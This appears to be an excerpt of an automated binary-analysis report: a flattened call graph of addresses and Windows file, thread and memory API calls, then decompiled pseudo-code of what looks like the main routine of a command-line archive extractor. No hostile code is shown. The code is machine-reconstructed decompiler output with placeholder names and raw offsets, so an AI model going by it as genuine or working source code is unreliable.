35416 42956b 35408->35416 35419 4296d5 35408->35419 35493 42a06f 35408->35493 35497 4264f7 __EH_prolog 35408->35497 35596 429f42 __EH_prolog 35408->35596 35411 42946d 35409->35411 35412 408604 ctype __EH_prolog 35411->35412 35412->35405 35413->35408 35421 429925 2 API calls 35414->35421 35417 429925 2 API calls 35415->35417 35418 429925 2 API calls 35416->35418 35420 4295a6 35417->35420 35418->35420 35424 429925 2 API calls 35419->35424 35422 40862d ctype __EH_prolog 35420->35422 35421->35420 35423 4295b9 35422->35423 35426 408604 ctype __EH_prolog 35423->35426 35425 429713 35424->35425 35597 4299b8 __EH_prolog __EH_prolog ctype 35425->35597 35426->35405 35436 4290f3 35428->35436 35429 429274 35431 40862d ctype __EH_prolog 35429->35431 35433 429287 35431->35433 35432 4299f0 __EH_prolog __EH_prolog __EH_prolog 35432->35436 35434 408604 ctype __EH_prolog 35433->35434 35452 429122 35434->35452 35435 408604 __EH_prolog ctype 35435->35436 35436->35432 35436->35435 35436->35452 35454 42925f 35436->35454 35920 4298b3 __EH_prolog 35436->35920 35437 42932b 35439 429925 2 API calls 35437->35439 35438 429360 35440 429925 2 API calls 35438->35440 35439->35429 35442 42937b 35440->35442 35921 4299b8 __EH_prolog __EH_prolog ctype 35442->35921 35444 42a06f 82 API calls 35444->35454 35445 429429 35446 429925 2 API calls 35445->35446 35447 42945a 35446->35447 35448 40862d ctype __EH_prolog 35447->35448 35450 42946d 35448->35450 35449 4264f7 122 API calls 35449->35454 35451 408604 ctype __EH_prolog 35450->35451 35451->35452 35452->35048 35453 42a381 82 API calls 35453->35454 35454->35429 35454->35437 35454->35438 35454->35444 35454->35445 35454->35449 35454->35453 35455 429660 35454->35455 35456 42956b 35454->35456 35460 4295ed 35454->35460 35463 4296d5 35454->35463 35922 429f42 __EH_prolog 35454->35922 35457 429925 2 API calls 35455->35457 35459 429925 2 API calls 35456->35459 35458 4295a6 35457->35458 35462 40862d ctype __EH_prolog 35458->35462 35459->35458 35461 429925 2 API calls 35460->35461 35461->35458 35465 4295b9 35462->35465 35464 429925 2 API calls 35463->35464 35466 429713 35464->35466 35467 408604 ctype __EH_prolog 35465->35467 35923 4299b8 __EH_prolog __EH_prolog ctype 35466->35923 35467->35452 35469->35038 35471 409d07 CreateDirectoryW 35470->35471 35472 409ce7 35470->35472 35474 409d15 35471->35474 35475 409d19 GetLastError 35471->35475 35481 409ad5 __EH_prolog WideCharToMultiByte __EH_prolog AreFileApisANSI 35472->35481 35474->35365 35475->35474 35479 409d26 35475->35479 35476 409cf1 35482 409cbc CreateDirectoryA 35476->35482 35478 409cf8 35478->35474 35479->35474 35480 409d4a CreateDirectoryW 35479->35480 35480->35478 35481->35476 35482->35478 35483->35378 35484->35378 35485->35378 35487 40862d ctype __EH_prolog 35486->35487 35488 429953 35487->35488 35489 408604 ctype __EH_prolog 35488->35489 35490 42995e 35489->35490 35491 408604 ctype __EH_prolog 35490->35491 35492 429984 35491->35492 35492->35399 35494 42a098 35493->35494 35598 42a237 35494->35598 35760 42cd7d __EH_prolog 35497->35760 35499 426646 35500 40862d ctype __EH_prolog 35499->35500 35575 426843 35499->35575 35504 4266a6 35500->35504 35501 426519 35501->35499 35562 426bfc 35501->35562 35801 424385 __EH_prolog 35501->35801 35502 426712 35505 408604 ctype __EH_prolog 35502->35505 35504->35502 35541 42675a 35504->35541 35508 426721 35505->35508 35507 426ce1 35509 426ff5 35507->35509 35527 427051 35507->35527 35513 426730 DeleteCriticalSection 35508->35513 35511 408604 ctype __EH_prolog 35509->35511 35510 426abe 35518 408604 ctype __EH_prolog 35510->35518 35514 427004 35511->35514 35512 426ceb 35515 408604 ctype __EH_prolog 35512->35515 35524 426745 35513->35524 35519 427013 DeleteCriticalSection 35514->35519 35520 426d08 35515->35520 35516 426b96 35522 408604 ctype __EH_prolog 35516->35522 35517 426b29 35533 408604 ctype __EH_prolog 35517->35533 35523 426aef 35518->35523 35519->35524 35531 426d17 DeleteCriticalSection 35520->35531 35521 426d2c 35526 408604 ctype __EH_prolog 35521->35526 35529 426bb6 35522->35529 35536 426afe DeleteCriticalSection 35523->35536 35525 40862d ctype __EH_prolog 35524->35525 35530 42703e 35525->35530 35534 426d5f 35526->35534 35778 467ad0 35527->35778 35784 44fb10 35527->35784 35789 423a69 35527->35789 35796 44f020 35527->35796 35528 426e07 35542 408604 ctype __EH_prolog 35528->35542 35540 426bc5 DeleteCriticalSection 35529->35540 35532 408604 ctype __EH_prolog 35530->35532 35531->35521 35532->35562 35537 426b5a 35533->35537 35544 426d6e DeleteCriticalSection 35534->35544 35535 4270bd 35539 408604 ctype __EH_prolog 35535->35539 35566 426b13 35536->35566 35548 426b69 DeleteCriticalSection 35537->35548 35538 426d99 35549 408604 ctype __EH_prolog 35538->35549 35556 4270ce 35539->35556 35546 426bda 35540->35546 35541->35510 35541->35516 35541->35517 35541->35575 35775 40c914 __EH_prolog 35541->35775 35543 426e24 35542->35543 35550 426e33 DeleteCriticalSection 35543->35550 35544->35566 35545 426e60 SysFreeString 35547 426e74 35545->35547 35553 40862d ctype __EH_prolog 35546->35553 35551 408604 ctype __EH_prolog 35547->35551 35548->35566 35552 426db9 35549->35552 35550->35566 35555 426e89 35551->35555 35560 426dc8 DeleteCriticalSection 35552->35560 35557 426bf0 35553->35557 35554 40862d ctype __EH_prolog 35558 426f36 35554->35558 35563 426e98 DeleteCriticalSection 35555->35563 35802 42434d __EH_prolog __EH_prolog ctype 35556->35802 35561 408604 ctype __EH_prolog 35557->35561 35559 408604 ctype __EH_prolog 35558->35559 35559->35562 35565 426ddd 35560->35565 35561->35562 35562->35408 35563->35566 35567 40862d ctype __EH_prolog 35565->35567 35566->35554 35568 426df3 35567->35568 35569 408604 ctype __EH_prolog 35568->35569 35569->35562 35570 426ebd 35572 426ed1 SysFreeString 35570->35572 35571 426a0c SysFreeString 35571->35575 35573 426ee7 35572->35573 35577 408604 ctype __EH_prolog 35573->35577 35574 408604 __EH_prolog ctype 35574->35575 35575->35507 35575->35512 35575->35521 35575->35528 35575->35538 35575->35545 35575->35570 35575->35571 35575->35574 35576 426f47 35575->35576 35578 408604 ctype __EH_prolog 35576->35578 35579 426efc 35577->35579 35580 426f56 35578->35580 35582 426f0b DeleteCriticalSection 35579->35582 35581 408604 ctype __EH_prolog 35580->35581 35583 426f65 35581->35583 35582->35566 35584 408604 ctype __EH_prolog 35583->35584 35585 426f74 35584->35585 35586 426f83 DeleteCriticalSection 35585->35586 35587 426f98 35586->35587 35588 40862d ctype __EH_prolog 35587->35588 35589 426fae 35588->35589 35590 408604 ctype __EH_prolog 35589->35590 35590->35562 35595->35405 35596->35408 35597->35405 35601 42a23a 35598->35601 35599 42a0b3 35599->35408 35601->35599 35603 42a0b8 __EH_prolog 35601->35603 35609 42a1fa 39 API calls 35601->35609 35604 42a0da 35603->35604 35610 411ed0 35604->35610 35614 40bd37 35604->35614 35617 412027 __EH_prolog 35604->35617 35605 42a10f 35605->35601 35609->35601 35612 411ee2 35610->35612 35611 411f14 35611->35605 35612->35611 35613 409ccb 9 API calls 35612->35613 35613->35612 35724 40b8bf __EH_prolog 35614->35724 35616 40bd51 35616->35605 35618 412055 35617->35618 35619 412121 35618->35619 35620 41210d 35618->35620 35636 4120c3 35618->35636 35621 41213f 35619->35621 35623 41212e 35619->35623 35622 40c20f VariantClear 35620->35622 35624 40c20f VariantClear 35621->35624 35622->35636 35625 40c20f VariantClear 35623->35625 35626 41215b 35624->35626 35625->35636 35626->35636 35735 411fa9 __EH_prolog 35626->35735 35630 41219c 35631 412211 35630->35631 35632 412222 35630->35632 35630->35636 35633 40c20f VariantClear 35631->35633 35634 412229 35632->35634 35635 412bb1 35632->35635 35633->35636 35638 40c20f VariantClear 35634->35638 35637 40c20f VariantClear 35635->35637 35636->35605 35637->35636 35639 41224e 35638->35639 35739 411f1a __EH_prolog 35639->35739 35642 411f1a 2 API calls 35643 41227d 35642->35643 35643->35636 35644 411f1a 2 API calls 35643->35644 35645 412297 35644->35645 35645->35636 35743 408833 __EH_prolog 35645->35743 35647 40862d ctype __EH_prolog 35648 4125d1 35647->35648 35649 408604 ctype __EH_prolog 35648->35649 35649->35636 35650 4122dd 35651 411ed0 9 API calls 35650->35651 35655 41241c 35650->35655 35702 4122e4 35650->35702 35672 4123ca 35651->35672 35652 412444 35658 41245e 35652->35658 35755 409b24 8 API calls 35652->35755 35653 41247c 35656 40b431 9 API calls 35653->35656 35680 412918 35653->35680 35655->35652 35655->35653 35657 41249f 35656->35657 35659 4124f1 35657->35659 35660 4124ae 35657->35660 35657->35680 35665 40862d ctype __EH_prolog 35658->35665 35675 412579 35659->35675 35687 412538 35659->35687 35661 4124b6 35660->35661 35676 412628 35660->35676 35685 40862d ctype __EH_prolog 35661->35685 35662 412b5c 35666 40862d ctype __EH_prolog 35662->35666 35663 412761 35670 412952 35663->35670 35679 41276a 35663->35679 35664 4126b7 35756 40cd50 __EH_prolog 35664->35756 35668 41268e 35665->35668 35669 412ba3 35666->35669 35674 408604 ctype __EH_prolog 35668->35674 35677 408604 ctype __EH_prolog 35669->35677 35759 409f99 12 API calls 35670->35759 35671 4126bf 35671->35680 35694 4126c7 35671->35694 35672->35655 35746 4098cf __EH_prolog 35672->35746 35674->35636 35675->35658 35675->35676 35682 412599 35675->35682 35676->35663 35676->35664 35677->35636 35757 40cd50 __EH_prolog 35679->35757 35680->35662 35698 412ab4 35680->35698 35700 4129c7 35680->35700 35682->35676 35684 4125a0 35682->35684 35683 412782 35686 41281d 35683->35686 35696 41278a 35683->35696 35684->35702 35703 4125e7 35684->35703 35688 4124e0 35685->35688 35758 409bc3 8 API calls 35686->35758 35693 40862d ctype __EH_prolog 35687->35693 35690 408604 ctype __EH_prolog 35688->35690 35690->35636 35691 412828 35707 412830 35691->35707 35714 41290f 35691->35714 35692 412b0a 35699 40862d ctype __EH_prolog 35692->35699 35695 412566 35693->35695 35712 412709 35694->35712 35713 412735 35694->35713 35697 408604 ctype __EH_prolog 35695->35697 35696->35712 35696->35713 35697->35636 35698->35662 35698->35692 35701 412b3d 35699->35701 35708 40862d ctype __EH_prolog 35700->35708 35704 408604 ctype __EH_prolog 35701->35704 35702->35647 35705 40862d ctype __EH_prolog 35703->35705 35704->35636 35706 412612 35705->35706 35710 408604 ctype __EH_prolog 35706->35710 35722 412872 35707->35722 35723 4128b7 35707->35723 35709 4129cf 35708->35709 35711 408604 ctype __EH_prolog 35709->35711 35710->35636 35711->35636 35716 40862d ctype __EH_prolog 35712->35716 35717 40862d ctype __EH_prolog 35713->35717 35714->35680 35715 4129a0 35714->35715 35715->35700 35718 4128a9 35716->35718 35719 4128ee 35717->35719 35720 408604 ctype __EH_prolog 35718->35720 35721 408604 ctype __EH_prolog 35719->35721 35720->35636 35721->35636 35722->35712 35723->35713 35725 40b931 35724->35725 35726 40b8da 35724->35726 35727 40b9c0 FindCloseChangeNotification 35725->35727 35728 40b8e5 AreFileApisANSI 35726->35728 35729 40b938 35727->35729 35730 40822f __EH_prolog WideCharToMultiByte 35728->35730 35731 40b93c CreateFileW 35729->35731 35734 40b8ff 35729->35734 35730->35734 35732 40b95d 35731->35732 35731->35734 35733 40b986 CreateFileW 35732->35733 35732->35734 35733->35734 35734->35616 35736 411fde 35735->35736 35737 40c20f VariantClear 35736->35737 35738 412017 35737->35738 35738->35630 35738->35636 35754 408e6d __EH_prolog __EH_prolog __EH_prolog __EH_prolog __EH_prolog 35738->35754 35741 411f50 35739->35741 35740 40c20f VariantClear 35742 411f97 35740->35742 35741->35740 35742->35636 35742->35642 35744 40862d ctype __EH_prolog 35743->35744 35745 40884f 35744->35745 35745->35650 35747 4098fa CreateFileW 35746->35747 35748 4098eb SetLastError 35746->35748 35750 40995c 35747->35750 35752 409922 35747->35752 35749 40998d 35748->35749 35749->35655 35750->35749 35751 40996d SetFileTime CloseHandle 35750->35751 35751->35749 35752->35750 35753 40994a CreateFileW 35752->35753 35753->35750 35754->35630 35755->35658 35756->35671 35757->35683 35758->35691 35759->35714 35761 42cd9e 35760->35761 35774 42cf33 35760->35774 35761->35774 35803 42cfaa __EH_prolog ctype 35761->35803 35764 42cdcf 35765 42cf8d 35764->35765 35804 42cfaa __EH_prolog ctype 35764->35804 35767 408604 ctype __EH_prolog 35765->35767 35766 42ce44 35768 408604 ctype __EH_prolog 35766->35768 35767->35774 35770 42ce50 35768->35770 35769 42ce20 35769->35765 35769->35766 35771 408604 ctype __EH_prolog 35770->35771 35772 42cf27 35771->35772 35773 408604 ctype __EH_prolog 35772->35773 35773->35774 35774->35501 35805 40c83c __EH_prolog 35775->35805 35777 40c940 35777->35541 35812 46cd08 35778->35812 35781 467af3 35781->35535 35782 467af8 GetLastError 35783 467b02 35782->35783 35783->35535 35785 44fb24 35784->35785 35787 44fd6d 35784->35787 35785->35787 35865 40e410 35785->35865 35869 40fb0c 35785->35869 35787->35535 35790 40862d ctype __EH_prolog 35789->35790 35791 423a7b 35790->35791 35792 40862d ctype __EH_prolog 35791->35792 35793 423a86 35792->35793 35794 423b1b 35793->35794 35916 40d997 35793->35916 35794->35535 35797 44f041 35796->35797 35799 44f032 35796->35799 35798 40fb0c 84 API calls 35797->35798 35797->35799 35800 40e410 8 API calls 35797->35800 35798->35797 35799->35535 35800->35797 35801->35501 35802->35562 35803->35764 35804->35769 35807 40c85e 35805->35807 35806 40c8e4 35806->35777 35807->35806 35809 40d550 __EH_prolog 35807->35809 35810 4585c0 VirtualAlloc 35809->35810 35811 40d623 35810->35811 35811->35806 35814 46cd18 35812->35814 35813 46cd5b 35815 46c0ff 10 API calls 35813->35815 35814->35813 35816 46cd26 CreateThread 35814->35816 35817 46cd61 35815->35817 35818 46cd53 GetLastError 35816->35818 35820 467ae9 35816->35820 35822 46cd73 TlsGetValue 35816->35822 35817->35820 35821 4705d3 12 API calls 35817->35821 35818->35813 35820->35781 35820->35782 35821->35820 35823 46cdc0 TlsSetValue 35822->35823 35824 46cdab 35822->35824 35827 46cdd7 35823->35827 35828 46cddf GetCurrentThreadId 35823->35828 35842 46e3ea 35824->35842 35864 46d03c 7 API calls 35827->35864 35830 46cdf0 35828->35830 35834 46ce39 35830->35834 35831 46cdde 35831->35828 35835 46ce42 35834->35835 35836 46e383 12 API calls 35835->35836 35837 46ce4a 35836->35837 35838 46ce57 35837->35838 35839 46d03c 7 API calls 35837->35839 35840 46e3ea 12 API calls 35838->35840 35839->35838 35841 46ce5e ExitThread 35840->35841 35843 46e3f8 35842->35843 35844 46e489 35842->35844 35845 46e401 TlsGetValue 35843->35845 35846 46e40e 35843->35846 35844->35823 35845->35846 35847 46e47a TlsSetValue 35845->35847 35848 46e41b 35846->35848 35849 46c0ff 10 API calls 35846->35849 35847->35844 35850 46e429 35848->35850 35852 46c0ff 10 API calls 35848->35852 35849->35848 35851 46e437 35850->35851 35853 46c0ff 10 API calls 35850->35853 35854 46e445 35851->35854 35855 46c0ff 10 API calls 35851->35855 35852->35850 35853->35851 35856 46e453 35854->35856 35857 46c0ff 10 API calls 35854->35857 35855->35854 35858 46e461 35856->35858 35860 46c0ff 10 API calls 35856->35860 35857->35856 35859 46e472 35858->35859 35861 46c0ff 10 API calls 35858->35861 35862 46c0ff 10 API calls 35859->35862 35860->35858 35861->35859 35863 46e479 35862->35863 35863->35847 35864->35831 35866 40e434 35865->35866 35867 40e453 35866->35867 35874 40e738 35866->35874 35867->35785 35871 40fb19 35869->35871 35870 40fb43 35870->35785 35871->35870 35882 42a1c1 35871->35882 35888 42a276 35871->35888 35877 40e6d6 __EH_prolog EnterCriticalSection 35874->35877 35876 40e75c 35876->35867 35880 40d340 SetFilePointer GetLastError GetLastError 35877->35880 35878 40e708 35879 40e71d LeaveCriticalSection 35878->35879 35881 40d071 SetFilePointer GetLastError ReadFile GetLastError VirtualAlloc 35878->35881 35879->35876 35880->35878 35881->35879 35883 42a1cc 35882->35883 35895 40b9c0 35883->35895 35898 412db2 __EH_prolog 35883->35898 35910 40bd82 SetFileTime 35883->35910 35884 42a1e0 35884->35871 35892 42a282 35888->35892 35889 42a32f 35889->35871 35890 42a237 82 API calls 35890->35892 35891 42a0b8 54 API calls 35891->35892 35892->35889 35892->35890 35892->35891 35911 4260f0 35892->35911 35915 42a1fa 39 API calls 35892->35915 35896 40b9ca FindCloseChangeNotification 35895->35896 35897 40b9d5 35895->35897 35896->35897 35897->35884 35904 412f40 35898->35904 35905 412dd1 35898->35905 35899 412eaf 35900 411fa9 VariantClear __EH_prolog 35899->35900 35902 412ee2 35899->35902 35899->35904 35900->35902 35901 412f30 35909 46c55c 26 API calls 35901->35909 35902->35901 35903 409a29 8 API calls 35902->35903 35903->35901 35904->35884 35905->35899 35905->35904 35906 40bd82 SetFileTime 35905->35906 35907 412e8f 35906->35907 35908 40d3f3 FindCloseChangeNotification 35907->35908 35908->35899 35909->35904 35910->35884 35912 426111 35911->35912 35913 426101 35911->35913 35912->35892 35914 40d402 WriteFile GetLastError 35913->35914 35914->35912 35915->35892 35917 40d9a1 35916->35917 35918 40fb0c 84 API calls 35917->35918 35919 40d9d0 35918->35919 35919->35794 35920->35436 35921->35452 35922->35454 35923->35452 35924 46e6aa SetUnhandledExceptionFilter 35925 41c10c __EH_prolog 35926 41c143 35925->35926 35928 41c139 35925->35928 35926->35928 35935 4152b6 __EH_prolog 35926->35935 35929 41c19d 35929->35928 35936 41528b __EH_prolog 35929->35936 35931 41c251 35937 40cf50 35931->35937 35934 41c267 GetLastError 35934->35928 35935->35929 35936->35931 35940 40bc29 35937->35940 35943 40bbf0 35940->35943 35942 40bc47 35942->35928 35942->35934 35944 40b8bf 7 API calls 35943->35944 35945 40bc0d 35944->35945 35945->35942

                                                                                  Executed Functions

                                                                                  Function 00403A70 Relevance: 46.7, APIs: 3, Strings: 23, Instructions: 1177COMMONCrypto
                                                                                  Download Yara Rule
                                                                                  C-Code - Quality: 89%
                                                                                  			E00403A70(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _t502;
				signed int _t503;
				signed char _t504;
				signed int _t507;
				signed int _t508;
				char _t517;
				signed int _t518;
				signed int _t534;
				signed int _t549;
				signed int _t554;
				signed int _t569;
				void* _t571;
				void* _t574;
				void* _t577;
				signed int _t583;
				void* _t598;
				signed int _t614;
				signed int _t625;
				signed int _t626;
				signed int _t642;
				signed int _t647;
				signed int _t648;
				intOrPtr* _t676;
				void* _t689;
				signed int _t706;
				intOrPtr* _t720;
				signed int _t725;
				void* _t729;
				signed int _t730;
				signed int _t739;
				signed int _t757;
				signed int _t764;
				signed int _t769;
				signed int _t784;
				unsigned char _t786;
				signed char _t787;
				signed int _t788;
				signed char _t792;
				signed int _t793;
				signed int _t794;
				signed int _t809;
				signed int _t812;
				signed int _t815;
				intOrPtr _t829;
				intOrPtr _t861;
				signed int _t918;
				intOrPtr _t996;
				signed int _t1065;
				signed int _t1067;
				signed int _t1068;
				signed int _t1069;
				signed int _t1070;
				signed int _t1073;
				char* _t1077;
				void* _t1079;
				void* _t1081;
				void* _t1082;

				L0046B890(0x473088, _t1079);
				_t1082 = _t1081 - 0x36c;
				_push(__ebx);
				SetFileApisToOEM();
				E00405B9F(_t1079 - 0x4c);
				 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
				_t1073 = 0;
				 *(_t1079 - 4) = 0;
				L00403532(_t1079 - 0x2c, GetCommandLineW());
				_t1049 = _t1079 - 0x4c;
				 *(_t1079 - 4) = 1;
				L00406C53(_t1079 - 0x2c, _t1079 - 0x4c);
				 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
				L00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
				if( *((intOrPtr*)(_t1079 - 0x44)) != 1) {
					L004036D9(__ebx, _t1079 - 0x4c, 0, 0, 1);
					E00404C12(_t1079 - 0x2d8);
					 *(_t1079 - 4) = 3;
					E0040FEC3(_t1079 - 0x7c);
					_push(_t1079 - 0x2d8);
					_push(_t1079 - 0x4c);
					 *(_t1079 - 4) = 4;
					L0040FED1(_t1079 - 0x7c, __eflags);
					__eflags =  *((char*)(_t1079 - 0x2d8));
					if( *((char*)(_t1079 - 0x2d8)) == 0) {
						__eflags =  *((char*)(_t1079 - 0x2d7));
						if( *((char*)(_t1079 - 0x2d7)) != 0) {
							E00458600();
							L0040BF39(1);
						}
						__eflags =  *((char*)(_t1079 - 0x2d2));
						_t829 = 0x490ab0;
						if( *((char*)(_t1079 - 0x2d2)) == 0) {
							_t829 = 0x490ab8;
						}
						__eflags =  *((char*)(_t1079 - 0x2d1));
						 *0x490a80 = _t829;
						if( *((char*)(_t1079 - 0x2d1)) != 0) {
							_t1049 = 0;
							__eflags = 0;
							E004051E3(_t829, 0);
						}
						_push(_t1079 - 0x2d8); // executed
						E0041035D(_t1079 - 0x7c); // executed
						_push(0x1c);
						_t502 = L004079F2();
						 *(_t1079 - 0x14) = _t502;
						__eflags = _t502 - _t1073;
						 *(_t1079 - 4) = 6;
						if(_t502 == _t1073) {
							_t1065 = 0;
							__eflags = 0;
						} else {
							_t1065 = E00405328(_t502);
						}
						__eflags = _t1065 - _t1073;
						 *(_t1079 - 0x20) = _t1065;
						 *(_t1079 - 4) = 4;
						 *(_t1079 - 0x130) = _t1065;
						if(_t1065 != _t1073) {
							 *((intOrPtr*)( *_t1065 + 4))(_t1065);
						}
						 *(_t1079 - 4) = 7;
						_t503 = E0041741C(_t1065); // executed
						__eflags = _t503 - _t1073;
						if(_t503 != _t1073) {
							 *(_t1079 - 0x14) = _t503;
							L0046B8F4(_t1079 - 0x14, 0x47d368);
						}
						_t504 = L0040FE22(_t1079 - 0x2b8);
						__eflags =  *(_t1065 + 0x10) - _t1073;
						 *(_t1079 - 0xd) = _t504;
						if( *(_t1065 + 0x10) == _t1073) {
							__eflags = _t504;
							if(_t504 != 0) {
								L21:
								_t812 =  *0x48aad4; // 0x48ab10
								 *(_t1079 - 0x14) = _t812;
								L0046B8F4(_t1079 - 0x14, 0x47d358);
							} else {
								__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 6;
								if( *((intOrPtr*)(_t1079 - 0x2b8)) == 6) {
									goto L21;
								} else {
									_t815 = L0040FE46(_t1079 - 0x2b8);
									__eflags = _t815;
									if(_t815 != 0) {
										goto L21;
									}
								}
							}
						}
						_push(4);
						L157();
						 *((intOrPtr*)(_t1079 - 0x60)) = 0x47a668;
						_push(_t1079 - 0x60);
						_push(_t1079 - 0x170);
						 *(_t1079 - 4) = 8;
						_t507 = L004176BE(_t1065);
						__eflags = _t507;
						if(_t507 == 0) {
							_t809 =  *0x48aad8; // 0x48aaf4
							 *(_t1079 - 0x14) = _t809;
							L0046B8F4(_t1079 - 0x14, 0x47d358);
						}
						__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 8;
						if( *((intOrPtr*)(_t1079 - 0x2b8)) != 8) {
							__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 7;
							if( *((intOrPtr*)(_t1079 - 0x2b8)) != 7) {
								L61:
								__eflags =  *(_t1079 - 0xd);
								if( *(_t1079 - 0xd) != 0) {
									_push(0x48);
									_t508 = L004079F2();
									 *(_t1079 - 0x14) = _t508;
									__eflags = _t508 - _t1073;
									 *(_t1079 - 4) = 0xd;
									if(_t508 == _t1073) {
										_t1065 = 0;
										__eflags = 0;
									} else {
										_t1065 = E004053AD(_t508);
									}
									__eflags = _t1065;
									 *(_t1079 - 4) = 8;
									 *(_t1079 - 0x30) = _t1065;
									if(_t1065 != 0) {
										 *((intOrPtr*)( *_t1065 + 4))(_t1065);
									}
									 *((intOrPtr*)(_t1065 + 0x40)) = _t829;
									 *((char*)(_t1065 + 0xc)) =  *((intOrPtr*)(_t1079 - 0x2a8));
									_t330 = _t1065 + 0x10; // 0x10
									 *(_t1079 - 4) = 0xe;
									E00401E26(_t330, _t1079 - 0x2a4);
									 *((intOrPtr*)(_t1065 + 0x20)) = 0;
									 *(_t1065 + 0x28) = 0;
									 *(_t1065 + 0x30) = 0;
									 *((intOrPtr*)(_t1065 + 0x38)) = 0;
									 *(_t1065 + 0x24) = 0;
									 *(_t1065 + 0x2c) = 0;
									 *(_t1065 + 0x34) = 0;
									 *((intOrPtr*)(_t1065 + 0x3c)) = 0;
									L0040347F(_t1079 - 0xc4);
									 *((char*)(_t1079 - 0xbc)) =  *((intOrPtr*)(_t1079 - 0x2a8));
									 *(_t1079 - 4) = 0xf;
									 *((intOrPtr*)(_t1079 - 0xc0)) = _t829;
									E00401E26(_t1079 - 0xb8, _t1079 - 0x2a4);
									E00404B67(_t1079 - 0xf4);
									_t517 =  *((intOrPtr*)(_t1079 - 0x2d3));
									 *(_t1079 - 4) = 0x10;
									 *((char*)(_t1079 - 0xf4)) = _t517;
									 *((char*)(_t1079 - 0xf3)) = _t517;
									_t518 = L0040FE34(_t1079 - 0x2b8);
									__eflags =  *((intOrPtr*)(_t1079 - 0x2b8)) - 3;
									 *(_t1079 - 0xec) = _t518;
									 *((char*)(_t1079 - 0xf1)) = _t518 & 0xffffff00 |  *((intOrPtr*)(_t1079 - 0x2b8)) == 0x00000003;
									 *((intOrPtr*)(_t1079 - 0xe8)) =  *((intOrPtr*)(_t1079 - 0x288));
									E00401E26(_t1079 - 0xe4, _t1079 - 0x294);
									 *((char*)(_t1079 - 0xf2)) =  *((intOrPtr*)(_t1079 - 0x2d0));
									 *((char*)(_t1079 - 0xf0)) =  *((intOrPtr*)(_t1079 - 0x297));
									E0040862D();
									_push(_t1079 - 0x25c);
									E00405BBA(_t1079 - 0xd8);
									 *((intOrPtr*)(_t1079 - 0x2c)) = 0;
									 *(_t1079 - 0x28) = 0;
									 *((intOrPtr*)(_t1079 - 0x24)) = 0;
									E00401E9A(_t1079 - 0x2c, 3);
									_push(_t1079 - 0xac);
									_push(_t1079 - 0x2c);
									_push(_t1065);
									_push(_t1079 - 0xc4);
									_push(_t1079 - 0xf4);
									_push( *((intOrPtr*)( *((intOrPtr*)(_t1079 - 0x2c0)))) + 0xc);
									 *(_t1079 - 4) = 0x11;
									_push(_t1079 - 0x270);
									_push(_t1079 - 0x284);
									_t534 = E00415D31( *(_t1079 - 0x20), _t1079 - 0x60, __eflags); // executed
									__eflags =  *(_t1079 - 0x28);
									 *(_t1079 - 0x18) = _t534;
									if( *(_t1079 - 0x28) != 0) {
										_push( *((intOrPtr*)(_t1079 - 0x2c)));
										L00407CEC(E00407CD5(L00407CC0(_t829, 0x407ccd), "Error: "));
										__eflags =  *(_t1079 - 0x18);
										if( *(_t1079 - 0x18) == 0) {
											 *(_t1079 - 0x18) = 0x80004005;
										}
									}
									L00407CC0(_t829, 0x407ccd);
									_t536 =  *(_t1065 + 0x24);
									_t861 =  *((intOrPtr*)(_t1065 + 0x20));
									__eflags =  *(_t1065 + 0x24);
									if(__eflags > 0) {
										L121:
										L00407CC0(L00407DED(E00407CD5(_t829, "Archives: "), __eflags, _t861, _t536), 0x407ccd);
									} else {
										__eflags = _t861 - 1;
										if(__eflags > 0) {
											goto L121;
										}
									}
									__eflags =  *(_t1065 + 0x28) |  *(_t1065 + 0x2c);
									if(( *(_t1065 + 0x28) |  *(_t1065 + 0x2c)) != 0) {
										L136:
										__eflags =  *(_t1065 + 0x24);
										if( *(_t1065 + 0x24) > 0) {
											L138:
											L00407CC0(_t829, 0x407ccd);
											_t543 =  *(_t1065 + 0x28);
											_t866 =  *(_t1065 + 0x2c);
											__eflags =  *(_t1065 + 0x28) |  *(_t1065 + 0x2c);
											if(__eflags != 0) {
												L00407CC0(L00407DED(E00407CD5(_t829, "Archive Errors: "), __eflags, _t543, _t866), 0x407ccd);
											}
											_t544 =  *(_t1065 + 0x30);
											_t867 =  *(_t1065 + 0x34);
											__eflags =  *(_t1065 + 0x30) |  *(_t1065 + 0x34);
											if(__eflags != 0) {
												L00407CC0(L00407DED(E00407CD5(_t829, "Sub items Errors: "), __eflags, _t544, _t867), 0x407ccd);
											}
										} else {
											__eflags =  *((intOrPtr*)(_t1065 + 0x20)) - 1;
											if( *((intOrPtr*)(_t1065 + 0x20)) > 1) {
												goto L138;
											}
										}
										__eflags =  *(_t1079 - 0x18);
										if( *(_t1079 - 0x18) != 0) {
											 *(_t1079 - 0x14) =  *(_t1079 - 0x18);
											L0046B8F4(_t1079 - 0x14, 0x47d368);
										}
										L00407A18( *((intOrPtr*)(_t1079 - 0x2c)));
										 *(_t1079 - 4) = 0xf;
										E00405489(_t1079 - 0xf4);
										L00407A18( *((intOrPtr*)(_t1079 - 0xb8)));
										__eflags = _t1065;
										 *(_t1079 - 4) = 8;
										if(_t1065 != 0) {
											 *((intOrPtr*)( *_t1065 + 8))(_t1065);
										}
										 *(_t1079 - 4) = 7;
										E00408604(_t1079 - 0x60);
										_t549 =  *(_t1079 - 0x20);
										 *(_t1079 - 4) = 4;
										__eflags = _t549;
										if(_t549 != 0) {
											 *((intOrPtr*)( *_t549 + 8))(_t549);
										}
										 *(_t1079 - 4) = 3;
										L00406E46(_t1079 - 0x7c, _t1065);
										 *(_t1079 - 4) =  *(_t1079 - 4) & 0x00000000;
										E00405233(_t1079 - 0x2d8, __eflags);
										 *((intOrPtr*)(_t1079 - 0x4c)) = 0x47a420;
										 *(_t1079 - 4) = 0x12;
										goto L154;
									} else {
										__eflags =  *(_t1065 + 0x30) |  *(_t1065 + 0x34);
										if(( *(_t1065 + 0x30) |  *(_t1065 + 0x34)) != 0) {
											goto L136;
										} else {
											__eflags =  *(_t1079 - 0x18);
											if( *(_t1079 - 0x18) != 0) {
												 *(_t1079 - 0x14) =  *(_t1079 - 0x18);
												L0046B8F4(_t1079 - 0x14, 0x47d368);
											}
											_t569 =  *(_t1079 - 0x94);
											__eflags = _t569 |  *(_t1079 - 0x90);
